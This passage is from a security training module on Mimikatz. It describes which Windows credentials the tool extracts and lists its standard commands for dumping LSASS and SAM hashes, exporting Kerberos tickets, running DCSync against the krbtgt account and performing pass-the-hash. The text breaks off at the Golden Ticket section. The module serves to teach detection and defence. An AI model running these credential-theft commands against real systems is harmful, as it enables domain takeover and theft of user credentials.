
Module 5 · Mimikatz — Credential Extraction

Manish Garg, Associate CISSP · RingSafe
April 19, 2026

Mimikatz is the tool that defined modern Windows credential attacks. Benjamin Delpy's 2011 research paper accompanying it single-handedly changed how the security community thinks about Windows authentication. This module covers what Mimikatz does, how defenders catch it, and why Credential Guard matters.

What it extracts

Mimikatz reads credentials from process memory (primarily LSASS — the Local Security Authority Subsystem Service) and from the local SAM and SECURITY (LSA secrets) registry hives. Specifically:

  • NTLM hashes of logged-in users (from LSASS)
  • Plaintext passwords if WDigest is enabled (legacy — disabled by default in modern Windows)
  • Kerberos tickets — TGT and service tickets
  • Certificates and their private keys from the cert store
  • Local SAM password hashes
  • Cached domain credentials (MSCACHE)

Classic commands

# Enable SeDebugPrivilege in the current token (required to read LSASS memory)
privilege::debug

# Dump all logon passwords/hashes from LSASS
sekurlsa::logonpasswords

# Dump local SAM password hashes
lsadump::sam

# Export Kerberos tickets to disk
sekurlsa::tickets /export

# DCSync — replicate all password hashes from a DC (needs DCSync rights)
lsadump::dcsync /domain:corp.example.com /user:krbtgt

# Pass-the-Hash — authenticate using NTLM hash
sekurlsa::pth /user:Administrator /domain:corp /ntlm:HASH /run:cmd

Golden Ticket — the doomsday capability

If Mimikatz extracts the krbtgt account hash (via DCSync or from NTDS.dit), it can forge Kerberos TGTs for ANY user in the domain:
